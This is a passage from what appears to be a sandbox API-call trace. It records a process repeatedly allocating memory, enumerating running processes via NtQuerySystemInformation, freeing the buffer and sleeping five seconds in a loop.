BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.588] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.597] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.604] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.611] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.618] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.625] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.632] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.640] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.654] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.664] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.673] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.682] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.693] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.701] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.711] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.720] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.730] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.740] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.749] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.758] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.761] NtQuerySystemInformation (in: 